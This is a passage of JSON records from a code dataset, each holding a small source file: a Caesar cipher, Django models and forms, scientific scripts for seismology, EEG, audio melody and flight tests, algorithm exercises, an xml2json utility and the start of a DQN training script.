+{"seq_id":"356657851","text":"#BREXIT\n#FVIBMX\n\ndef cypher(text, shift_val):\n \"\"\"Inputs text and value you want to shift the characters and outputs the encoded language\"\"\"\n\n answer = \"\"\n \n text = text.upper()\n for i in (text):\n letnum = ord(i) + shift_val\n if letnum > 90:\n letnum = 64 + (letnum - 90)\n answer += chr(letnum)\n print(answer)\n \ndef decypher(text, shift_val):\n \"\"\"Inputs cypher text and value you want to shift the characters and outputs the decoded language\"\"\"\n\n answer = \"\"\n \n text = text.upper()\n for i in (text):\n letnum = ord(i) - shift_val\n if letnum < 65:\n letnum = 90 + (letnum - 64)\n answer += chr(letnum)\n \n print(answer)\n\ndef bruteforce(text):\n \"\"\"Goes through all combinations possible for a caesar cypher text\"\"\"\n for i in range(1,27):\n decypher(text,i)\n","sub_path":"Caesar_Cipher.py","file_name":"Caesar_Cipher.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"203823459","text":"from django.db import models\n\n\nclass Land(models.Model):\n title = models.CharField('заголовок на главной', max_length=100)\n sub_title = models.CharField('меньший заголовок главной', max_length=100)\n text = models.TextField('текст на главной')\n picture = models.ImageField('Картинка на главной', upload_to='ecoc/photos/')\n title_second = 
models.CharField('заголовок третьей сноски', max_length=100)\n title_head = models.CharField('заголовок третьей сноски 1', max_length=100)\n sub_line = models.CharField('строка sub', max_length=100)\n about_line = models.CharField('строка с описанием ', max_length=100)\n title_head1 = models.CharField('заголовок третьей сноски 2', max_length=100)\n sub_line1 = models.CharField('строка sub', max_length=100)\n about_line1 = models.CharField('строка с описанием ', max_length=100)\n title_head2 = models.CharField('заголовок третьей сноски 3', max_length=100)\n sub_line2 = models.CharField('строка sub', max_length=100)\n about_line2 = models.CharField('строка с описанием ', max_length=100)\n title_1 = models.CharField('заголовок первой сноски', max_length=100)\n slider = models.ImageField('Картинка слайдер 1', upload_to='ecoc/photos/')\n text_slider = models.TextField('надпись под картинкой-слайдером 1')\n slider1 = models.ImageField('Картинка слайдер 2', upload_to='ecoc/photos/')\n text_slider1 = models.TextField('надпись под картинкой-слайдером 2')\n slider2 = models.ImageField('Картинка слайдер 3', upload_to='ecoc/photos/')\n text_slider2 = models.TextField('надпись под картинкой-слайдером 3')\n slider3 = models.ImageField('Картинка слайдер 4', upload_to='ecoc/photos/')\n text_slider3 = models.TextField('надпись под картинкой-слайдером 4')\n slider4 = models.ImageField('Картинка слайдер 5', upload_to='ecoc/photos/')\n text_slider4 = models.TextField('надпись под картинкой-слайдером 5')\n slider5 = models.ImageField('Картинка слайдер 6', upload_to='ecoc/photos/')\n text_slider5 = models.TextField('надпись под картинкой-слайдером 6')\n title_2 = models.CharField('заголовок второй сноски', max_length=100)\n text1 = models.TextField('надпись второй сноски1')\n text11 = models.TextField('Вторая колонки сноски1', null=True, blank=True)\n picture_big = models.ImageField('Большая картинка вторая сноска', upload_to='ecoc/photos/')\n text2 = models.TextField('надпись второй сноски2')\n picture_little = models.FileField('первая маленькая картинка, вторая сноска', upload_to='ecoc/photos/')\n text3 = models.TextField('надпись второй сноски2')\n picture_little1 = models.FileField('вторая маленькая картинка, вторая сноска', upload_to='ecoc/photos/')\n text4 = models.TextField('надпись второй сноски2')\n picture_little2 = models.FileField('третья маленькая ка��тинка, вторая сноска', upload_to='ecoc/photos/')\n title_3 = models.CharField('Заголовок вопрос-ответ', max_length=100)\n title_4 = models.CharField('Заголовок заказа', max_length=100)\n\n\nclass Shop(models.Model):\n link_url = models.URLField('ссылка на магазин', null=True, blank=True)\n image_for = models.ImageField('картинка партнера', null=True, blank=True, upload_to='ecoc/photos/')\n event = models.CharField('event', null=True, blank=True, max_length=100)\n\n\nclass Faq(models.Model):\n question = models.TextField('Вопрос')\n answer = models.TextField('Ответ')\n","sub_path":"cis/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"272165796","text":"from datetime import (\n datetime,\n time,\n timedelta,\n)\nfrom ..forms import AjaxForm\nfrom ..forms.fields import (\n login_field,\n first_name_field,\n last_name_field,\n lead_time_field,\n start_date_field,\n end_date_field,\n welcome_message_field,\n)\n\n\n# dates in the past\ndef date_in_the_past(form, field_data, extra_data):\n if field_data:\n if 
datetime.combine(field_data, time()) < datetime.now():\n return {'valid': False,\n 'message': 'Date is in the past!',\n 'color': 'warning'}\n\n\n# start date < end date\ndef end_date_before_start_date(form, end_date, extra_data):\n start_date = form.data.get('start_date')\n if end_date and start_date and start_date > end_date:\n return {'valid': False,\n 'message': 'Start date can not be less than end date!',\n 'color': 'warning'}\n\n\n# date > 1 year\ndef date_futuristic(form, date, extra_data):\n if date:\n future_max = datetime.now() + timedelta(days=365)\n if datetime.combine(date, time()) > future_max:\n return {'valid': False,\n 'message': 'Date more then one year from now!',\n 'color': 'warning'}\n\n\nclass InvitationForm(AjaxForm):\n json_validators = [('start_date', date_in_the_past),\n ('start_date', date_futuristic),\n ('end_date', date_in_the_past),\n ('end_date', end_date_before_start_date)]\n email = login_field\n first_name = first_name_field\n last_name = last_name_field\n lead_time = lead_time_field\n start_date = start_date_field\n end_date = end_date_field\n welcome_message = welcome_message_field\n\n\nclass EditInvitationForm(AjaxForm):\n json_validators = [('start_date', date_in_the_past),\n ('start_date', date_futuristic),\n ('end_date', date_in_the_past),\n ('end_date', end_date_before_start_date)]\n first_name = first_name_field\n last_name = last_name_field\n lead_time = lead_time_field\n start_date = start_date_field\n end_date = end_date_field\n welcome_message = welcome_message_field\n","sub_path":"mts/forms/invitation.py","file_name":"invitation.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"199047245","text":"##################################################################\n# USER INPUT\n##################################################################\n# path to project and source model\nprojectpath = '../'\nsourcepath = '.'\n# Resolution of the coastlines (only relevant for ocean distributions)\n# (see basemap documentation)\n# Use coarser for global and finer for regional models\ncoastres = 'i' \n# sampling rate of synthetic Green's function in Hz\nsampling_rate = 1.0\n# length of synthetic seismograms\nn_samples = 3600\n\n################\n# geography\n################\n# list distributions: 'homogeneous', 'ocean','gaussian_blob', 'from_file'\ndistribution_types = [\n'homogeneous'\n]\n# parameters for homogeneous, ocean: none\n# parameters for gaussian blob: center (lat,lon), sigma_radius_m, only_ocean\n# parameters for from_file: filename\ndistribution_params = [\nNone\n]\n\n################\n# spectra\n################\n# list spectra for the above distributions. 
'gaussian','from_file'\nspectrum_types = ['gaussian']\n# parameters for gaussian: mean, standard deviation in Hz\nspectrum_params = [ {'mean':0.15,'std':0.02,'weight':5.}]\n###############################################################################\n\n\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport h5py\nfrom noisi.my_classes.basisfunction import BasisFunction\nfrom noisi.util.source_masks import get_source_mask\nfrom noisi.util.plot import plot_grid\ntry:\n from scipy.fftpack import next_fast_len\nexcept ImportError:\n from noisi.borrowed_functions.scipy_next_fast_len import next_fast_len\nfrom obspy.signal.invsim import cosine_taper\nimport json\n\nn = next_fast_len(2*n_samples-1) \nfreq = np.fft.rfftfreq(n,d=1./sampling_rate)\nprint(freq.shape)\ntaper = cosine_taper(len(freq),0.005)\n\ngrd = np.load(os.path.join(projectpath,'sourcegrid.npy'))\nsource_config = json.load(open(os.path.join(sourcepath,'source_config.json')))\nbfunc_type = source_config['spectra_decomposition']\nbfunc_K = source_config['spectra_nr_parameters']\n\n\nb = BasisFunction(bfunc_type,bfunc_K,N=len(freq))\n\n\n\n\n\nspectrum_coefficients = np.zeros((len(spectrum_types),bfunc_K))\ngeographic_weights = np.zeros((len(distribution_types),grd.shape[-1]))\n\n\ndef gauss_spectrum(sparams):\n spec = taper*np.exp(-(freq-sparams['mean'])**2/\n (2*sparams['std']**2))\n return spec / np.max(np.abs(spec)) * sparams['weight']\n\n\nfor ix_spec in range(len(spectrum_types)):\n \n # get the spectrum\n if spectrum_types[ix_spec] == 'gaussian':\n spectrum = gauss_spectrum(spectrum_params[ix_spec])\n elif spectrum_types[ix_spec] == 'from_file':\n spectrum = np.load(spectrum_params[ix_spec])\n \n # decompose the spectra in the chosen basis\n coeff = b.coeff(spectrum)\n spectrum_coefficients[ix_spec,:] = coeff\n\n\n# get the geographic weights\nfor ix_geo in range(len(distribution_types)):\n\n if distribution_types[ix_geo] =='gaussian_blob':\n\n geographic_weights[ix_geo,:] = get_source_mask('gaussian',grd,\n coastres,distribution_params[ix_geo])\n print(geographic_weights[ix_geo])\n\n elif distribution_types[ix_geo] in ['ocean','homogeneous']:\n\n geographic_weights[ix_geo,:] = get_source_mask(\n distribution_types[ix_geo],grd,coastres)\n \n \n else:\n print(distribution_types[ix_geo])\n raise NotImplementedError('Unknown geographical distributions. 
\\\n Must be \\'gaussian\\', \\'homogeneous\\' or \\'ocean\\'.')\n\n\n# get the weighted sum for each location and save\n\nwith h5py.File(os.path.join(sourcepath,'step_0','starting_model.h5'),'w') as fh:\n fh.create_dataset('coordinates',data=grd.astype(np.float64))\n fh.create_dataset('frequencies',data=freq.astype(np.float64))\n fh.create_dataset('model',data=np.zeros((grd.shape[-1],bfunc_K)),\n dtype=np.float32)\n\n\n for ix_loc in range(grd.shape[-1]):\n\n for ix_spec in range(len(spectrum_types)):\n #print(geographic_weights[ix_spec,ix_loc])\n fh['model'][ix_loc,:] += geographic_weights[ix_spec,ix_loc] *\\\n spectrum_coefficients[ix_spec,:]\n\n \n\n fh.flush()\n fh['model'].attrs['spectral_basis'] = bfunc_type\n fh.create_dataset('surf_areas',data=np.ones(grd.shape[-1]))\n\nwith h5py.File(os.path.join(sourcepath,'step_0','base_model.h5'),'w') as fh:\n fh.create_dataset('coordinates',data=grd.astype(np.float64))\n fh.create_dataset('frequencies',data=freq.astype(np.float64))\n fh.create_dataset('model',data=np.empty((grd.shape[-1],bfunc_K)),\n dtype=np.float32)\n\n\n for ix_loc in range(grd.shape[-1]):\n\n for ix_spec in range(len(spectrum_types)):\n \n fh['model'][ix_loc,:] += spectrum_coefficients[ix_spec,:]\n\n fh.flush()\n fh['model'].attrs['spectral_basis'] = bfunc_type\n fh.create_dataset('surf_areas',data=np.ones(grd.shape[-1]))\n# plot\nfor ix_spec in range(len(spectrum_types)):\n spec = np.zeros(freq.shape)\n for i in range(bfunc_K):\n spec += b.basis_vector(i,len(freq)) \\\n * spectrum_coefficients[ix_spec,i]\n plt.plot(freq,spec,linewidth=2)\n\nplt.xlabel('Frequency (Hz)')\nplt.ylabel('Source power (scaled)')\nplt.savefig(os.path.join(sourcepath,'freq_distr_startingmodel.png'))\n#\n#plt.plot_grid(grd[0],grd[1],colored_by_frequency,\n# normalize=False,sequential=True,cmap='viridis')\n","sub_path":"noisi/test/testdata/testsrc/setting_up_testmodel/setup_noisesource_basis.py","file_name":"setup_noisesource_basis.py","file_ext":"py","file_size_in_byte":5295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"492713867","text":"import unittest\nimport requests\nfrom pathlib import Path\n\n\nfrom pysbolgraph.SBOL2Graph import SBOL2Graph as Graph\n\n\nSBOL2DIR = Path(__file__).parent.parent / \"SBOLTestSuite\" / \"SBOL2\"\nFILEPATHS = SBOL2DIR.glob(\"*.xml\")\nENDPOINT = \"https://validator.sbolstandard.org/validate/\"\n\n\nrequest = {\n 'options': {\n 'language': 'SBOL2',\n 'test_equality': True,\n 'check_uri_compliance': False,\n 'check_completeness': False,\n 'check_best_practices': False,\n 'continue_after_first_error': True,\n 'provide_detailed_stack_trace': False,\n 'insert_type': False,\n 'uri_prefix': 'http://foo/',\n 'main_file_name': 'main file',\n 'diff_file_name': 'comparison file',\n },\n 'return_file': False,\n 'main_file': None,\n 'diff_file': None\n}\n\n\ndef generate_test(path):\n def test(self):\n self.case = path.stem\n g = Graph()\n g.load(str(path))\n with open(path) as main:\n request['main_file'] = main.read()\n request['diff_file'] = g.serialize_xml().decode('utf-8')\n\n self.resp = requests.post(ENDPOINT, json=request).json()\n self.assertTrue(self.resp['valid'])\n return test\n\nclass MetaTestClass(type):\n\n @classmethod\n def __prepare__(mcls, name, bases):\n d = dict()\n for path in FILEPATHS:\n testname = f\"test_{path.stem}\"\n d[testname] = generate_test(path)\n return d\n\n\nclass TestValidation(unittest.TestCase, metaclass=MetaTestClass):\n 
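\"\"\"Round-trip validation tests; MetaTestClass generates one test method per SBOL2 file.\"\"\"\n 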
pass\n","sub_path":"test/test_validation.py","file_name":"test_validation.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"649439229","text":"#! /usr/bin/env python\n# \n# main.py\n# \n# Main script governing all separate modules. -\n# 2018-03-07\n# \n# -----------------------------------------------------------------------------\n\n# Standard library modules\nimport sys\n\n# Import data\nimport data.pfdf\nimport data.ftis\nimport os\n\n# Thrust calculations\nfrom engine.thrust import Thrust\nfrom identification.liftCurve import LiftCurve, DragPolar\nfrom identification.elevator import Elevator, TrimCurve, StickForce\nfrom simulate.manoeuvre import Phugoid, ShortPeriod, AperiodicRoll, DutchRoll, DutchRollDamped, Spiral\nimport parameters.massAndBalance as massAndBalance\nfrom utils.airspeed import Airspeed\n\n# Filenames\nlinux = sys.platform == 'linux' # Boolean variable\nif linux: os.chdir('/home/emiel/flighttest/')\nexcelName = 'data/data/Post_Flight_Datasheet_Flight_2_DD_15_3_2018.xlsx'\nftisName = 'data/data/FTISxprt-20180315_102929.mat'\n\n# Import data - creates 'handles' for later processing \nsheet = data.pfdf.ExcelSheet(excelName) # Read data from Excel\nweights = data.pfdf.Weights(sheet) # Extract weights\n\n# Read data - ready to use in calculations via __getattribute__()\nstatdata = data.pfdf.StatData(sheet, 1) # Extract stationary measurements\nelevdata = data.pfdf.ElevData(sheet)\ncogshift = data.pfdf.COGshift(sheet)\n\ndata = data.ftis.FtisData(ftisName)\n\n# STATIONARY MEASUREMENTS\n# Thrust calculations\nthrustStat = Thrust('stat', statdata, weights, reload=False)\nthrustElev = Thrust('elev', elevdata, weights, reload=False)\n\n# Determine Lift curve and Drag polar\nliftCurve = LiftCurve(statdata, weights, thrustStat)\ndragPolar = DragPolar(liftCurve, thrustStat)\n\n# Determine Elevator characteristics\nelevator = Elevator(cogshift)\ntrimCurve = TrimCurve(elevator, elevdata, thrustElev, weights)\n# trimCurve.plot2()\nstickForce = StickForce(elevator, elevdata, weights)\nstickForce.plot()\nV = Airspeed(200, 0, 0, 0, weights)\n\n# liftCurve.plot()\n# dragPolar.plot()\n\n# DYNAMIC MEASUREMENTS\n# Get initial weight\ninitialWeight = massAndBalance.bem.scale + sum(weights.weights) + weights.fuelWeight\n\n# Manoeuvres\nph = Phugoid(initialWeight, data, -0.5626, -1.1642)\nshp = ShortPeriod(initialWeight, data, -0.5626, -1.1642)\nar = AperiodicRoll(initialWeight, data, -0.5626, -1.1642)\ndr = DutchRoll(initialWeight, data, -0.5626, -1.1642)\ndrd = DutchRollDamped(initialWeight, data, -0.5626, -1.1642)\nsp = Spiral(initialWeight, data, -0.5626, -1.1642)\n\n# Termination signal\nduration = 0.1\nfreq = 2000 \n# os.system('play --no-show-progress --null --channels 1 synth %s sine %f' % (duration, freq))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"206438917","text":"from ImageSplitting.ContourFinder import ContourFinder\nfrom ImageSplitting.ImageEllipsesProvider import ImageEllipsesProvider\n\n\nclass EllipseExtractor:\n\n def extract_ellipses(self, binary_mask):\n if not (len(binary_mask.shape) == 2 and binary_mask.shape[0] == binary_mask.shape[1]):\n raise Exception()\n image_size = binary_mask.shape[0]\n\n contours = ContourFinder().find_contours(binary_mask)\n field = ImageEllipsesProvider(contours, image_size)\n ellipses = 
field.build_ellipses()\n result = []\n\n for ellipse in ellipses:\n minx, miny, maxx, maxy = ellipse.get_overlap_ellipse().bounds\n center = (ellipse.center[0] - minx, ellipse.center[1] - miny)\n long_length, short_length = ellipse.long_length, ellipse.short_length\n angle = ellipse.angle\n minx, miny, maxx, maxy = [self._norm_index(value, image_size) for value in (minx, miny, maxx, maxy)]\n\n ellipse_params = ((center[0], center[1], long_length, short_length, angle), (minx, miny, maxx, maxy))\n result.append(ellipse_params)\n return result\n\n @staticmethod\n def _norm_index(value, image_size):\n if value < 0:\n return 0\n if value > image_size - 1:\n return image_size - 1\n return value\n","sub_path":"ImageSplitting/EllipseExtractor.py","file_name":"EllipseExtractor.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"106119478","text":"print('\\n\\t============ Epochs ============\\n')\n\n# Epochs\nepochs = mne.Epochs(raw,\n\t\t events=events, \n\t\t event_id=event_id, \n\t\t tmin=tmin, \n\t\t tmax=tmax, \n\t\t # baseline=baseline, # (None, 0) # Could be changed to baseline, changed\n\t\t picks=picks, # Changed from None to picks\n\t\t name='Unknown', \n\t\t preload=False, # Changed to True - Changed back to false or 52 baselines are calculated\n\t\t reject=None, \n\t\t flat=None, \n\t\t proj=True, \n\t\t decim=1, \n\t\t reject_tmin=None,\n\t\t reject_tmax=None, \n\t\t detrend=None, \n\t\t add_eeg_ref=True, \n\t\t on_missing='error', \n\t\t verbose=None)\n\n# VERY LONG, DOESN'T WORK\n# epochs = mne.Epochs(raw, events, event_id, tmin, tmax)\n\n# Save epochs to avoid recalculating later\n# epochs.save('epochs.fif')\n# saved_epochs = mne.read_epochs('sample-epo.fif')\n\nprint('\\n')\nprint(epochs)\nprint('\\n\\n')\n\n\n# QUESTION: WHAT ARE EVOKES AND ARE THEY NECESSARY?\n\nepoch_sit = epochs['SIT_GO']\n# epoch_stand = epochs['STAND_GO'].average()\n\nprint(epoch_sit)\n\n# Removed because FFT plot uses previous variable\n# epoch_sit_data = epoch_sit.get_data()\n# print(epoch_sit_data)\n\n'''\nevoked_sit = epoch_sit.average()\nprint(evoked_sit)\nevoked_sit.plot()\n'''\n\n'''\nevoked = epochs.average() # Average to create Evoked \ncov = mne.compute_covariance(epochs, tmax=0) # Calculate baseline covariance \nforward = mne.make_forward_solution(evoked.info, mri, src, bem, mindist=5.0) \ninverse = mne.minimum_norm.make_inverse_operator(evoked.info, forward, cov) \nstc = mne.minimum_norm.apply_inverse(evoked, inverse, \n lambda2=1. / 9.) 
# Source estimates \n'''\n'''\nevents2 = mne.find_events(raw, stim_channel='STI 014')\nprint(events[:5])\nevent_id2 = dict(ST_READY=1, SIT_GO=2)\n'''\n\n","sub_path":"Process/epochs.py","file_name":"epochs.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"511855397","text":"# series homework\ndef fibonacci(n):\n '''Return the nth value of the fibonacci series'''\n if n<0:\n print (\"value must be positive\")\n return\n if n==0:\n return 0\n elif n==1:\n return 1\n else:\n return fibonacci(n-1) + fibonacci(n-2)\n\nfor i in range(10):\n print(fibonacci(i))\n\ndef lucas(n):\n '''Return the nth value of the lucas series'''\n if n<0:\n print (\"value must be positive\")\n return\n if n==0:\n return 2\n elif n==1:\n return 1\n else:\n return lucas(n-1) + lucas(n-2)\n\ndef sum_series(n, first_val=0, second_val=1):\n '''\n Return the nth value of a series of numbers where the next number\n in the series is a summation of the previous two numbers.\n The first two values in the series are optional input parameters\n to this function.\n '''\n if n<0:\n print (\"value must be positive\")\n return\n if n==0:\n return first_val\n elif n==1:\n return second_val \n else:\n return sum_series(n-1, first_val, second_val) + sum_series(n-2, first_val, second_val)\n\n# Tests for the functions in this file\n# test for fibonacci\nfibonacci(-2)\nassert fibonacci(5) == 5\n\n# test for lucas\nprint ('Testing lucas')\nlucas(-1)\n\nfor i in range(10):\n print(lucas(i))\n\n\n","sub_path":"students/cheryl/session02/series.py","file_name":"series.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"459643626","text":"__author__ = 'Michael'\n\n#Euler published the remarkable quadratic formula:\n#\n#n^2 + n + 41\n#\n#It turns out that the formula will produce 40 primes for the consecutive values n = 0 to 39.\n# However, when n = 40, 40^2 + 40 + 41 = 40(40 + 1) + 41 is divisible by 41, and certainly when n = 41, 41^2 + 41 + 41 is\n# clearly divisible by 41.\n#\n#Using computers, the incredible formula n^2 - 79n + 1601 was discovered, which produces 80 primes for the consecutive\n# values n = 0 to 79. 
The product of the coefficients, -79 and 1601, is -126479.\n#\n#Considering quadratics of the form:\n#\n#n^2 + an + b, where |a| < 1000 and |b| < 1000\n#\n#Find the product of the coefficients, a and b, for the quadratic expression that produces the maximum number\n# of primes for consecutive values of n, starting with n = 0.\n\nfrom problems import ProblemUtils\n\ndef doProblem():\n\n #We know b can only be in primes, because this has to work for n = 0\n primes = ProblemUtils.PrimesUpTo(1000)\n\n maxA, maxB, maxNum = 0, 0, 0\n\n for a in range(-1000, 1001):\n for b in primes:\n n = 0\n while 1:\n if not ProblemUtils.IsPrime(calculateQuadratic(n, a, b)):\n #We have consecutive primes from 0-n\n if n > maxNum:\n maxA, maxB, maxNum = a, b, n\n break\n n += 1\n return maxA * maxB\n\ndef calculateQuadratic(n, a, b):\n return n**2 + a*n + b","sub_path":"problems/level02/problem027.py","file_name":"problem027.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"354864351","text":"import vamp\nimport librosa\nimport numpy as np\nimport scipy.io.wavfile as wavfile\nimport matplotlib.pyplot as plt\n# This is the audio file we'll be analyzing.\n# You can download it here: http://labrosa.ee.columbia.edu/projects/melody/mirex05TrainFiles.zip\naudio_file = '../Tests/Amy_Winehouse_-_You_re_Wondering_Now-9b3lo5a3iEk.wav'\n# This is how we load audio using Essentia\nfm1, wav_data1 = wavfile.read(audio_file)\n\n# This is how we load audio using Librosa\naudio, sr = librosa.load(audio_file, mono=True)\ndata = vamp.collect(audio, sr, \"mtg-melodia:melodia\")\n# vector is a tuple of two values: the hop size used for analysis and the array of pitch values\n# Note that the hop size is *always* equal to 128/44100.0 = 2.9 ms\nhop, melody = data['vector']\nprint(hop)\nprint(melody)\n\ntimestamps = 8 * 128/44100.0 + np.arange(len(melody)) * (128/44100.0)\n# parameter values are specified by providing a dicionary to the optional \"parameters\" parameter:\nparams = {\"minfqr\": 100.0, \"maxfqr\": 4000.0, \"voicing\": 0.2, \"minpeaksalience\": 0.0}\n\ndata = vamp.collect(audio, sr, \"mtg-melodia:melodia\", parameters=params)\nhop, melody = data['vector']\n# Melodia returns unvoiced (=no melody) sections as negative values. So by default, we get:\nplt.figure(figsize=(18,6))\nplt.plot(timestamps, melody)\nplt.xlabel('Time (s)')\nplt.ylabel('Frequency (Hz)')\n\n\n\n\n# A clearer option is to get rid of the negative values before plotting\nmelody_pos = melody[:]\nmelody_pos[melody<=0] = 0\nplt.figure(figsize=(18,6))\nplt.plot(timestamps, melody_pos)\nplt.xlabel('Time (s)')\nplt.ylabel('Frequency (Hz)')\n\n# Finally, you might want to plot the pitch sequence in cents rather than in Hz. \n# This especially makes sense if you are comparing two or more pitch sequences \n# to each other (e.g. 
comparing an estimate against a reference).\nmelody_cents = 1200*np.log2(melody/55.0)\nmelody_cents[melody<=0] = 0\nplt.figure(figsize=(18,6))\nplt.plot(timestamps, melody_cents)\nplt.xlabel('Time (s)')\nplt.ylabel('Frequency (cents relative to 55 Hz)')\nplt.show()\n\nplt.show()\n","sub_path":"Audio_Processing/melody_extractor_demo.py","file_name":"melody_extractor_demo.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"95468754","text":"# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n def __str__(self):\n l = []\n n = self\n while n:\n l.append(n.val)\n n = n.next\n return l.__str__()\n def __repr__(self):\n return self.__str__()\nimport heapq\nclass Solution(object):\n def mergeKLists(self, lists):\n \"\"\"\n :type lists: List[ListNode]\n :rtype: ListNode\n \"\"\"\n lists = [(x.val, x) for x in lists if x]\n r=ListNode(0)\n r.next=None\n p=r\n heapq.heapify(lists)\n while len(lists) > 0:\n p.next = heapq.heappop(lists)[1]\n p = p.next\n c = p.next\n if c and len(lists)>0:\n heapq.heappush(lists, (c.val, c))\n return r.next\n\n def mergeKListsOld(self, lists):\n lists=filter(lambda x:x is not None, lists)\n lists.sort(key=lambda x:x.val)\n r=ListNode(0)\n r.next=None\n p=r\n while len(lists)>1:\n p.next=lists[0]\n p=p.next\n lists=lists[1:]\n c=p.next\n if c and len(lists)>0:\n l=0\n h=len(lists)+1\n while True:\n m=(l+h)/2\n if (m==0 or c.val>=lists[m-1].val) and (m==len(lists) or c.val<=lists[m].val):\n break\n elif (m > 0 and c.val<lists[m-1].val):\n h=m\n elif c.val>lists[m].val:\n l=m\n lists.insert(m,c)\n if len(lists) == 1:\n p.next = lists[0]\n return r.next\n \nif __name__ == '__main__':\n s = Solution()\n def toListNode(l):\n h = ListNode(0)\n tail = h\n for n in l:\n tail.next = ListNode(n)\n tail = tail.next\n return h.next\n def fromListNode(n):\n r = []\n while n:\n r.append(n.val)\n n = n.next\n return r\n\n import sys\n def printListNode(n):\n while n:\n sys.stdout.write(str(n.val)+' ')\n n = n.next\n print\n # printListNode(toListNode([1,2,3,4]))\n\n for l in open('data'):\n printListNode(s.mergeKLists(map(toListNode, eval(l))))\n \n\n","sub_path":"leetcode/23.merge-k-sorted-lists/src.py","file_name":"src.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"474002966","text":"#!/usr/bin/env python\n\n\"\"\"xml2json.py Convert XML to JSON\n\nRelies on ElementTree for the XML parsing. This is based on\npesterfish.py but uses a different XML->JSON mapping.\nThe XML->JSON mapping is described at\nhttp://www.xml.com/pub/a/2006/05/31/converting-between-xml-and-json.html\n\nRewritten to a command line utility by Hay Kranen < github.com/hay >\n\nXML JSON\n<e/> \"e\": null\n<e>text</e> \"e\": \"text\"\n<e name=\"value\"/> \"e\": { \"@name\": \"value\" }\n<e name=\"value\">text</e> \"e\": { \"@name\": \"value\", \"#text\": \"text\" }\n<e> <a>text</a><b>text</b> </e> \"e\": { \"a\": \"text\", \"b\": \"text\" }\n<e> <a>text</a> <a>text</a> </e> \"e\": { \"a\": [\"text\", \"text\"] }\n<e> text <a>text</a> </e> \"e\": { \"#text\": \"text\", \"a\": \"text\" }\n\nThis is very similar to the mapping used for Yahoo Web Services\n(http://developer.yahoo.com/common/json.html#xml).\n\nThis is a mess in that it is so unpredictable -- it requires lots of testing\n(e.g. to see if values are lists or strings or dictionaries). For use\nin Python this could be vastly cleaner. 
Think about whether the internal\nform can be more self-consistent while maintaining good external characteristics\nfor the JSON.\n\nLook at the Yahoo version closely to see how it works. Maybe can adopt\nthat completely if it makes more sense...\n\nR. White, 2006 November 6\n\"\"\"\n\nimport xml.etree.cElementTree as ET\nimport optparse, sys, os\n\ndef elem_to_internal(elem,strip=1):\n\n \"\"\"Convert an Element into an internal dictionary (not JSON!).\"\"\"\n\n d = {}\n for key, value in elem.attrib.items():\n d[key] = value\n\n # loop over subelements to merge them\n for subelem in elem:\n v = elem_to_internal(subelem,strip=strip)\n tag = subelem.tag\n value = v[tag]\n try:\n # add to existing list for this tag\n d[tag].append(value)\n except AttributeError:\n # turn existing entry into a list\n d[tag] = [d[tag], value]\n except KeyError:\n # add a new non-list entry\n d[tag] = value\n text = elem.text\n tail = elem.tail\n if strip:\n # ignore leading and trailing whitespace\n if text: text = text.strip()\n if tail: tail = tail.strip()\n\n if tail:\n d['tail'] = tail\n\n if d:\n # use #text element if other attributes exist\n if text: d[\"data\"] = text\n else:\n # text is the value if no attributes\n d = text or None\n return {elem.tag: d}\n","sub_path":"xml2json.py","file_name":"xml2json.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"141801692","text":"#WAP: use of for loop in python\r\n\r\ndef DisplayF(value):\r\n print(\"o/p of For LOOp\")\r\n icnt = 0\r\n for icnt in range (0,value):\r\n print(\"Jay Ganesh\")\r\n\r\ndef DisplayW(value):\r\n print(\"o/p for whle loop\")\r\n icnt = 0\r\n while icnt float:\n \"\"\"Trains `mainDQN` with target Q values given by `targetDQN`\n Args:\n mainDQN (dqn.DQN): Main DQN that will be trained\n targetDQN (dqn.DQN): Target DQN that will predict Q_target\n train_batch (list): Minibatch of replay memory\n Each element is (s, a, r, s', done)\n [(state, action, reward, next_state, done), ...]\n Returns:\n float: After updating `mainDQN`, it returns a `loss`\n \"\"\"\n states = np.vstack([x[0] for x in train_batch])\n actions = np.array([x[1] for x in train_batch])\n rewards = np.array([x[2] for x in train_batch])\n next_states = np.vstack([x[3] for x in train_batch])\n done = np.array([x[4] for x in train_batch])\n\n X = states\n\n Q_target = rewards + DISCOUNT_RATE * np.max(targetDQN.predict(next_states), axis=1) * ~done\n\n y = mainDQN.predict(states)\n y[np.arange(len(X)), actions] = Q_target\n\n # Train our network using target and predicted Q values on each episode\n return mainDQN.update(X, y)\n\n\ndef get_copy_var_ops(*, dest_scope_name: str, src_scope_name: str) -> List[tf.Operation]:\n \"\"\"Creates TF operations that copy weights from `src_scope` to `dest_scope`\n Args:\n dest_scope_name (str): Destination weights (copy to)\n src_scope_name 